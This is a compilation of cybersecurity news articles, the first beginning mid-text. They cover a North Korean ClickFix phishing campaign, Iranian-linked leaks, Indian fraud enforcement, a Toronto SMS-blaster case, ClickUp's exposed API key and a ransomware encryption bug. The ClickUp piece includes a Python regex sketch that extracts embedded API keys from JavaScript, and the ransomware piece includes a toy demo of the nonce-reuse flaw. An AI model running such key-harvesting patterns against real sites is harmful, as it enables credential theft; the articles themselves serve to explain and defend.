The problem intensifies in 2026's threat landscape, where exploit windows have shrunk dramatically to just 10 hours on average, demanding rapid response capabilities. Traditional purple teaming, limited to periodic workshops, cannot keep pace with agile adversaries exploiting zero-days and supply chain vulnerabilities. Without genuine fusion, red teams uncover flaws that blue teams log but rarely operationalize, leading to repeated failures during live incidents. This disconnect leaves enterprises exposed, as detections remain unrefined and defenses static. 

At its core, authentic purple teaming requires shared goals, continuous feedback loops, and joint ownership of outcomes, not just shared meeting rooms. Many setups falter here, with red teams prioritizing stealthy attacks over teachable moments and blue teams focusing on alerts without contextual adversary emulation. The result is a performative exercise that boosts resumes but not resilience, ignoring metrics like mean-time-to-respond or coverage of MITRE ATT&CK frameworks. 

To evolve, organizations must shift to autonomous, continuous purple teaming powered by AI agents that simulate attacks, investigate alerts, and map to real-world tactics. This approach validates detections in real-time, bridges the red-blue gap, and scales beyond human bandwidth. Forward-thinking teams are adopting adversarial exposure validation, ensuring defenses evolve proactively rather than reactively. Ultimately, ditching the purple label for hollow collaborations unlocks true synergy, fortifying organizations against 2026's relentless threats. By measuring success through integrated KPIs and embracing automation, security programs can transform from fragmented efforts into unified powerhouses.

Apricorn Launches 32TB Encrypted Drive to Strengthen Offline Data Security Against Cyber Threats

 

Security feels stronger when data is scrambled, yet that strength vanishes if login steps or secret codes fall into the wrong hands. Instead of relying on system files tucked inside computers - where sneaky programs like spyware or digital snoopers lurk - real protection means keeping those pieces far away from risk. Enter a fresh take from Apricorn: their updated Aegis Padlock DT FIPS line now includes a 32TB model built to lock out the host machine completely. 

This shift sidesteps common traps by handling safeguards directly on the drive itself. Authentication happens right on the device, using keys embedded into the drive's own interface. Rather than typing codes through the host machine, individuals enter their access number straight into the unit. Because of this setup, login details do not pass through the computer’s software layer, lowering risks tied to infected endpoints. 

According to Apricorn, cryptographic operations are managed entirely within the hardware via custom-built AegisWare code, ensuring private information stays separate from vulnerable environments. Isolated encrypted storage remains key for strong cyber defenses, says Apricorn's Kurt Markley. Not limited to online solutions, the device fits into wider efforts for securing data without connectivity. 

Instead of relying on the host system, access control moves directly onto the hardware itself. Threats often exploit weaknesses in software-driven methods - this design helps avoid those pitfalls. With every file saved, encryption happens instantly on the Aegis Padlock DT FIPS. Even at rest, both data and access codes stay locked down through strong encoding. Firmware tampering? Not possible - Apricorn built it so updates can’t sneak in. 

That wall keeps out threats like BadUSB, which twists ordinary USB gear into tools for system breaches. Priced close to $2,000, the 32TB model enters alongside lower-capacity encrypted drives. With built-in 256-bit AES XTS encryption, it operates directly through hardware protection. Verified under FIPS 140-2 Level 2 by NIST, its design meets strict governmental requirements. Compatibility spans across Windows, Linux, macOS, Android, and ChromeOS - no extra software needed. Despite higher cost, access remains smooth on multiple platforms out of the box. 

Despite limitations in certain setups, the device works reliably where standard encryption methods fail - think medical scanners, factory machines, isolated storage units, or built-in controllers. Transfer rates reach 5 gigabits per second thanks to a USB 3.2 Gen 1 connection. Inside, vital parts are shielded by a dense epoxy layer, resisting drops, impacts, and deliberate interference. Built tough, it handles rough conditions without compromising security. 

Even with strong built-in protections, the device cannot block all digital threats. Though separating encryption and login checks from the host machine lowers infection chances, firms have to protect where the drive is kept. Should someone get hold of the unit physically, how it's managed day-to-day matters as much as its coded defenses. Firms relying on this tool must enforce clear rules for where it's stored, who can reach it, and which verified machines link to it. 

Security hardware gains traction amid rising digital risks, driven by frequent attacks on weak software defenses and leaked login data. A surge in complex breaches pushes companies to adopt built-in protection methods instead of relying solely on traditional programs. This move reflects deeper changes across sectors aiming to reduce exposure through physical safeguards. Growing reliance on embedded tools marks a departure from older models dependent on patch-prone applications.

North Korean Hackers Breach US Crypto Executives in Just Five Minutes

 

Cybersecurity experts at Arctic Wolf have disclosed details of an advanced campaign targeting North American Web3 and cryptocurrency organizations. The campaign was launched by BlueNoroff, a financially motivated state-sponsored gang associated with the infamous North Korean Lazarus Group, with the aim of establishing persistent access on victims' devices.

The gang achieves this by fooling victims into deploying malware on their own systems; its tactics, however, are quite advanced.

The discovery 


Arctic Wolf found an active intrusion in which the threat actor used spear-phishing to send an altered Calendly calendar invite containing a typo-squatted Zoom link while posing as a respected figure in the fintech legal industry. When the victim clicked the link, they were shown a phony Zoom meeting interface that simultaneously launched a ClickFix-style clipboard injection attack and secretly exfiltrated their live camera feed for use as a lure in subsequent attacks.

After that, information was stolen from the victim's device and browsers via a multi-stage credential extraction pipeline that concentrated on cryptocurrency wallet extensions.

Now enters ClickFix

To launch the campaign, the hackers impersonate real, high-profile figures from the Web3 world, creating convincing fake headshots via ChatGPT and generating animated videos with Adobe Premiere Pro.

The hackers then build a fake Zoom video call website resembling the genuine Zoom call page and play the video to make the meeting look real.

Attack tactic 


The BlueNoroff gang would then invite the actual victim via Calendly, booking the meeting six months in advance to make it all look real and convincing, since prominent people are busy.

Once the victim opens the Zoom link, they see the usual: a video call webpage with the participants on the other side moving and acting like real people (remember, they are all fake, semi-animated videos). But after eight seconds on the call, a notification appears saying their “SDK is deprecated” and presenting an “Update Now” option.

“The technical execution chain in this campaign is both efficient and operationally disciplined. From initial URL click to full system compromise, including C2 establishment, Telegram session theft, browser credential harvesting, and persistence, the attacker completed in under five minutes,” Arctic Wolf said.

U.S. Marines Reportedly Targeted by Iranian-Linked Hackers in New Data Exposure Incident

 



Iran-linked hacking group Handala has allegedly leaked personal information belonging to thousands of U.S. Marines deployed across the Persian Gulf region, shortly after American military personnel in the Middle East began receiving threatening messages from the group.

According to posts published on Handala’s website, the hackers claim to have released the names and phone numbers of 2,379 U.S. Marines as proof of what they described as their “intelligence superiority.” The group further claimed that the exposed information represents only a small sample from a much larger collection of data allegedly tied to American military personnel stationed in the region.

Handala asserted that it possesses additional details related to military members and their families, including home addresses, movement patterns, military base affiliations, commuting routines, shopping behavior, and other personal activities. These claims have not been independently verified by U.S. authorities.

The alleged leak surfaced days after several U.S. service members reportedly received threatening WhatsApp messages warning that they were under surveillance. The messages referenced Iranian drone and missile systems and attempted to intimidate military personnel by claiming their identities and movements were being tracked. Similar threatening communications believed to be linked to Handala were also reportedly sent to civilians in Israel earlier this week, suggesting a broader psychological and cyber influence campaign connected to escalating tensions in the Middle East.

Since the regional conflict involving Iran, Israel, and the United States intensified earlier this year, Handala has repeatedly claimed responsibility for several high-profile cyber incidents. Last month, the group allegedly leaked hundreds of emails said to have originated from the personal Gmail account of Kash Patel. The hackers have also been linked to a cyberattack targeting medical technology company Stryker, an operation that reportedly resulted in data being erased from tens of thousands of employee devices globally.

However, questions remain regarding the authenticity and quality of the newly leaked Marine data. An analysis of the published sample reportedly identified multiple inconsistencies, including incomplete phone numbers and entries that appeared to contain military contract identifiers rather than personal names. Several listed numbers reportedly connected only to automated voicemail systems.

In a limited number of cases, voicemail names reportedly matched information included in the leak. One individual contacted by reporters allegedly confirmed their identity before ending the call, while others declined to comment or redirected inquiries to military public affairs officials.

U.S. Central Command referred media questions regarding the incident to the Naval Criminal Investigative Service, which had not publicly commented on the matter at the time of reporting.

The incident comes amid growing concerns over cyber-enabled psychological operations targeting military personnel and their families. Earlier this month, Navy Secretary John Phelan urged sailors to strengthen the security of their mobile devices and social media accounts amid concerns over phishing attacks and malicious online activity. In an internal warning, he noted that threat actors may attempt to manipulate military personnel into opening harmful files or clicking malicious links designed to compromise personal accounts and devices.

Handala publicly portrays itself as a pro-Palestinian hacktivist organization. However, multiple cybersecurity firms and recent assessments from the U.S. Department of Justice have alleged that the group operates as a front tied to Iran’s Ministry of Intelligence and Security (MOIS).

Cybersecurity experts note that modern cyber campaigns increasingly combine data leaks, online intimidation, and misinformation tactics to create psychological pressure rather than relying solely on technical disruption. Analysts also caution that hacker groups sometimes exaggerate the scale or sensitivity of stolen data to amplify fear and media attention.

Although U.S. authorities have previously seized domains associated with Handala, the group continues to remain active by turning to new websites and communication platforms, including Telegram, allowing it to sustain its cyber and propaganda operations online.

Investigation Uncovers Thousands of Accounts Tied to Digital Arrest Fraud Networks

 

Indian authorities have launched a massive enforcement response to the escalation of extortion and impersonation fraud resulting from cyber technology. The government informed the Supreme Court in January 2026 that over 9,400 WhatsApp accounts linked to so-called "digital arrest" scams had been banned following a focused 12-week operation. 

The coordinated crackdown on organized fraud networks, carried out in partnership with government agencies, reflects growing concern about criminal organizations exploiting communication platforms to impersonate law enforcement and regulatory authorities in financially motivated cybercrime campaigns.

WhatsApp's countermeasure strategy combines behavioural detection technologies with intelligence-driven monitoring systems, including logo-matching capability, account name logging, large language model-based scam pattern analysis, and a repeat offender database, in order to identify and disrupt evolving fraud infrastructure.

Explaining the government's position before the apex court, Attorney General Venkataramani said the enforcement measures and account suspensions were documented in a detailed status report submitted on February 9 by the Indian Cybercrime Coordination Centre (I4C) under the Ministry of Home Affairs, in compliance with Supreme Court directives aimed at curbing the rapid increase in digital arrest fraud in the country.

The case is being monitored by a bench headed by Chief Justice Surya Kant, having previously been taken up suo motu by another bench that had noted the escalation of online financial crimes involving impersonation-based extortion schemes and fraudulent virtual detentions.

As part of a wider institutional response, the court directed key regulatory and infrastructure agencies, including the Reserve Bank of India and the Department of Telecommunications, to develop a unified operational framework for victim compensation and cyber fraud response, signalling an emerging policy push toward inter-agency regulation of digital risk and mitigation of financial fraud. The case reportedly concerns a coordinated fraud operation in which perpetrators impersonated law enforcement officials to convince victims that they were under active investigation.

The accused allegedly used digital communication platforms to instil fear, urgency, and intimidation in potential victims. The Central Bureau of Investigation has arrested a former bank official along with two suspected associates allegedly involved in running the scam infrastructure. These "digital arrest" schemes typically involve prolonged voice or video interactions that isolate targets from external verification channels.

This allows fraudsters to maintain psychological control while coercing victims into transferring funds under the guise of legal clearances, compliance verifications, or settlements. Given the involvement of a banking insider, investigators have intensified their inquiry into potential misuse of financial systems, examining whether privileged access to transaction mechanisms or sensitive financial data allowed illicit funds to be transferred and withdrawn rapidly.

Forensic analysis of communication logs, transactional paths, and digital evidence is being conducted as part of the ongoing investigation to map the criminal ecosystem supporting the operation as well as identify additional facilitators, beneficiaries, and individuals affected by it. According to law enforcement agencies, digital arrest frauds are on the rise across the nation, incorporating social engineering, identity appropriation, and coordinated cyber-enabled deception techniques to exploit victims.

Authorities have also reiterated that legitimate government agencies never demand payments to avert criminal or legal action. Enforcement efforts intensified after investigative inputs were shared by the Indian Cyber Crime Coordination Centre, the Ministry of Electronics and Information Technology, and the Department of Telecommunications, leading to a broader intelligence-driven disruption campaign targeting the organised digital fraud ecosystem.

According to WhatsApp, government-reported accounts are not handled as isolated abuse incidents, but rather are analyzed as behavioural indicators to identify interconnected criminal infrastructures and their associated threat networks.

Nearly 3,800 accounts were originally flagged by the government, but the company's internal detection system greatly expanded the scope of the investigation, leading to the removal of thousands of additional accounts associated with suspected scam activities. 

In parallel, the platform has implemented several product-level safeguards intended to intercept fraud attempts during the early contact stages. These include alerts for suspicious first-time interactions, visibility indicators showing account age for unknown users, suppression of profile photographs in high-risk conversations, and expanded caller identification features.

The company expressed confidence that these interventions could help reduce the number of digital arrest frauds. However, it acknowledged that many operations are supported by cross-border criminal infrastructure, unauthorised payment channels, and external communication networks outside of its direct control, and stressed that multijurisdictional law enforcement actions would be required to prevent long-term disruptions. 

Aside from its submission to the Supreme Court, the Centre also proposed the establishment of an extensive multi-agency enforcement framework designed to strengthen telecom verification systems, financial fraud response protocols, and cybercrime prevention systems nationwide. Following consultation with regulatory and enforcement stakeholders, the report urged the court to direct telecommunications, electronics, and information technology authorities, as well as the Reserve Bank of India, to establish standardised and time-bound safeguards against digital arrest scams. 

An important element of the proposal is the rapid implementation of Telecommunications (User Identification) Rules along with a Biometric Identity Verification System in order to establish nationwide traceability and visibility into SIM issuance processes. 

Under a circular dated August 31, 2023, the Department of Telecommunications has instructed telecom service providers to enforce stricter compliance measures and required Point of Sale vendors that activate SIM cards to meet enhanced verification and accountability requirements.

Further, the report recommends that suspicious SIM cards associated with cybercrime investigations be blocked immediately. It also recommends that subscriber activation records and point of sale data be shared in real time with investigative agencies to improve the effectiveness of emergency response operations. 

During the course of monitoring the rapid expansion of digital arrest scams across India, the Supreme Court requested coordinated national action and periodic status updates from the enforcement and regulatory bodies responsible for the mitigation of cybercrime in India.

The coordinated crackdown represents one of India's most significant institutional responses to digital arrest fraud, reflecting the growing convergence of cybercrime enforcement, telecommunications regulation, financial oversight, and platform-level security interventions.

As investigative agencies continue to trace broader criminal networks and regulatory bodies implement stricter identity verification and fraud prevention guidelines, authorities believe sustained inter-agency coordination is crucial to disrupting organised scam ecosystems across digital communication networks and financial infrastructures. 

Moreover, these developments suggest that India’s cybercrime response strategy has evolved into one in which technology platforms, telecom operators, banks, and law enforcement agencies collaborate to counter increasingly sophisticated forms of cyber-enabled financial fraud.

Canada's First SMS Blaster Bust: 3 Arrested in Toronto Cybercrime Crackdown

 

Toronto police have exposed a first-of-its-kind SMS blaster cybercrime case in Canada, where investigators say three men used a rogue device to mimic a cell tower and push fake texts to nearby phones. The operation, known as Project Lighthouse, reportedly ran across the Greater Toronto Area for months before police arrested the suspects and seized multiple devices. 

The core issue is the use of an SMS blaster, a tool that can trick smartphones into connecting to a fake cellular signal. Once connected, the device can send fraudulent messages that look like they come from banks, delivery services, or other trusted organizations, often leading victims to phishing sites that steal passwords or banking details. Police also said the tactic creates a wider network risk because it can interrupt legitimate mobile connections. 

Investigators say the threat was not small in scale. Reports indicate tens of thousands of devices may have connected to the rogue equipment over several months, and police recorded more than 13 million network disruptions linked to the operation. That disruption is especially serious because it can interfere with emergency access, including the ability to reach 911.

The arrests show how quickly cybercrime is evolving from online-only scams into hybrid attacks that combine physical devices, mobility, and social engineering. Police charged the three suspects with a combined 44 offences, including fraud, mischief, personation, and unauthorized interception-related crimes. The case is being treated as Canada’s first confirmed investigation of this kind, which makes it a warning sign for other cities and countries. 

The broader lesson is that mobile phones can be vulnerable even when users do not click anything suspicious. If a rogue tower is nearby, the attack can start at the network level and then move into fake texts, credential theft, and financial fraud. For readers, the main takeaway is to be cautious with urgent SMS links, verify messages through official apps or websites, and treat unexpected texts from banks or government services as potentially malicious.

ClickUp API Key Exposure Leaves Corporate and Government Email Data Public for Over a Year

 

A previously unnoticed weakness in ClickUp’s web infrastructure sat undetected for over a year: an API key embedded in its public site left private data exposed. Because basic safeguards were missing, emails tied to businesses and government agencies could be pulled by outside parties, with no login required. The gap stemmed not from sophisticated hacking but from a routine coding oversight that slipped through deployment reviews. Hardcoded credentials like these often escape notice until someone examines the code closely, and months passed before scrutiny revealed what should have been caught earlier. Security gaps of this kind stem less from advanced threats than from everyday lapses repeated across teams. 

Public discussion of the problem began when security researcher Impulsive shared findings showing the leaked credential sat inside a JavaScript file served by ClickUp's site, loaded even before login. Since code delivered to browsers is always visible to users, extracting the API key took little effort and allowed direct contact with internal servers. Without any special access, a single basic query allegedly returned close to a thousand email addresses plus vast numbers of hidden development settings. The analysis showed that 959 employee email addresses were part of the leaked data, tied to staff at large companies and public institutions across various locations. 
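To illustrate why a key embedded in client-side JavaScript is trivially extractable, the sketch below runs credential-shaped regular expressions over a bundle, the way common secret scanners do. The bundle contents, variable names, key format, and endpoint are hypothetical, not ClickUp's actual code:

```python
import re

# Hypothetical JS bundle contents; the key name, value, and endpoint
# are illustrative, not taken from ClickUp's real site.
js_bundle = """
const API_BASE = "https://internal.example-app.com/api";
const API_KEY = "pk_live_51Hxyz0abcdef1234567890";
fetch(API_BASE + "/flags", { headers: { Authorization: API_KEY } });
"""

# Patterns of the kind secret scanners use: an assignment to a
# key-like variable, and a recognisable token prefix.
patterns = [
    r'API_KEY\s*=\s*["\']([A-Za-z0-9_\-]{16,})["\']',
    r'(pk_live_[A-Za-z0-9]{10,})',
]

found = set()
for pat in patterns:
    found.update(re.findall(pat, js_bundle))

print(sorted(found))  # the embedded key falls out with one pass
```

Automated scanners apply hundreds of such patterns to every publicly served script, which is why a credential shipped to the browser should be assumed compromised from the moment it is deployed.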

About 3,165 feature flags were also exposed, visible without restriction. Though they look like routine code, such flags can reveal how teams test software, plan releases, roll out new tools, or shape future updates. Malicious actors could therefore mine them to craft deceptive emails, manipulate individuals through tailored messages, or gather intelligence on a rival’s progress. Useful intelligence often hides where it seems least likely. News of the exposure surfaced early in 2025, yet by April 2026 it still had not been fixed, extending the window in which attackers could act. Because access stayed open so long, experts say attackers had more opportunities to attempt intrusions using stolen login details, fake identities, or personalised emails targeting workers at the affected organisations. 

The incident points to a wider issue for organisations that depend on cloud-based services. Though easy to avoid, hardcoded credentials remain common in modern codebases, and when secret tokens appear in public repositories, automated bots usually find them fast, sometimes in under sixty seconds. Even low-privilege access tokens can lead to large data leaks if internal systems lack strong authorisation checks. Regularly rotating API keys lowers exposure over time, client-side applications built without embedded secrets withstand attacks better, and strict limits on backend access form another layer of defence. 

Protection against phishing gains strength from tools such as DMARC, SPF, and DKIM; constant monitoring surfaces unusual logins faster; and active threat-intelligence feeds make exposed domains visible. Security improves not through one fix alone but through steady adjustments across systems. A quiet mistake lingered unseen within ClickUp's infrastructure, exposing data widely before detection. When operations move into shared cloud environments, oversight gaps often emerge, making careful monitoring essential. Lapses like this highlight growing pressure on organisations to act earlier, respond smarter, and stay alert longer.
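For context, SPF, DKIM, and DMARC are all published as DNS TXT records on the sending domain. A hypothetical configuration for a domain `example.com` might look like the following (the mailer hostname, selector, and truncated DKIM public key are placeholders, not a real deployment):

```
; Illustrative DNS TXT records for a hypothetical domain example.com
example.com.                      IN TXT "v=spf1 include:_spf.example-mailer.com -all"
_dmarc.example.com.               IN TXT "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"
selector1._domainkey.example.com. IN TXT "v=DKIM1; k=rsa; p=MIIBIjANBg..."
```

Here the SPF record rejects mail from unlisted servers (`-all`), the DMARC policy tells receivers to reject messages that fail authentication and to send aggregate reports, and the DKIM record publishes the public key receivers use to verify message signatures.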

VECT 2.0 Ransomware Bug Turns Malware Into a Permanent Data Wiper

Cybersecurity researchers have uncovered a major flaw in the VECT 2.0 ransomware that causes the malware to permanently destroy large files instead of properly encrypting them, making recovery impossible even if victims decide to pay a ransom.

The ransomware operation has reportedly been promoted on newer versions of BreachForums, where the group invited users to join its affiliate program. Interested participants were allegedly given access keys through private messages.

VECT operators also announced a collaboration with TeamPCP, the threat actor linked to recent supply-chain attacks targeting Trivy, LiteLLM, Telnyx, and even the European Commission. According to the announcement, the partnership aimed to exploit victims affected by those supply-chain breaches by deploying ransomware payloads and expanding attacks against additional organizations.

Critical Encryption Flaw Discovered

Researchers found that VECT 2.0 contains a serious issue in how it manages encryption nonces during the file-encryption process. Although the ransomware was designed to speed up encryption for large files, the implementation accidentally overwrites nonce data during each encryption cycle.

Because the malware reuses the same memory buffer for nonce generation, every newly created nonce overwrites the previous one. Once encryption completes, only the final nonce remains in the buffer, and only that nonce is written to disk.

This mistake means that only the last 25% of an affected file can potentially be recovered, while the remaining portions become permanently inaccessible due to the missing nonces.

The problem becomes even more severe because the lost nonces are not sent back to the attackers either. As a result, even the ransomware operators themselves would be unable to decrypt victim files after payment.
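A minimal Python sketch of this failure mode follows. It uses a toy SHA-256-based keystream rather than VECT's actual cipher, and the four-chunk file, key, and nonce derivation are illustrative only; the point is that fresh per-chunk nonces written into one reused buffer leave only the final chunk decryptable:

```python
import hashlib

def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    # Toy counter-mode keystream (illustration only, not VECT's cipher).
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

key = b"ransomware-key"
chunks = [b"chunk-0 data", b"chunk-1 data", b"chunk-2 data", b"chunk-3 data"]

# Buggy encryptor: one shared nonce buffer, overwritten every cycle.
nonce_buffer = b""
ciphertexts = []
for i, chunk in enumerate(chunks):
    nonce_buffer = hashlib.sha256(i.to_bytes(4, "big")).digest()[:12]  # fresh nonce
    ciphertexts.append(xor(chunk, keystream(key, nonce_buffer, len(chunk))))

# Only the final nonce survives the loop and is written to disk.
stored_nonce = nonce_buffer

# Decryption with the stored nonce recovers only the last chunk;
# the nonces for earlier chunks were destroyed, so that data is gone.
recovered = [xor(ct, keystream(key, stored_nonce, len(ct))) for ct in ciphertexts]
print(recovered[-1] == chunks[-1])  # last chunk decrypts correctly
print(recovered[0] == chunks[0])    # earlier chunks do not
```

With four nonces per file, as here, exactly the last quarter of the data survives, which mirrors the researchers' observation that only about the final 25% of an affected file is potentially recoverable.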

Security researchers warned that the flaw effectively transforms the ransomware into a destructive data wiper, particularly in enterprise environments where most valuable assets exceed the malware’s file-size threshold.

“At a threshold of only 128 KB, smaller than a typical email attachment or office document, what the code classifies as a large file encompasses not just VM disks, databases, and backups, but routine documents, spreadsheets, and mailboxes. In practice, almost nothing a victim would care to recover falls below this boundary,” Check Point says.

Researchers also confirmed that the same nonce-management vulnerability exists across all VECT 2.0 variants, including Windows, Linux, and ESXi versions, meaning the irreversible file destruction behavior impacts every platform supported by the ransomware.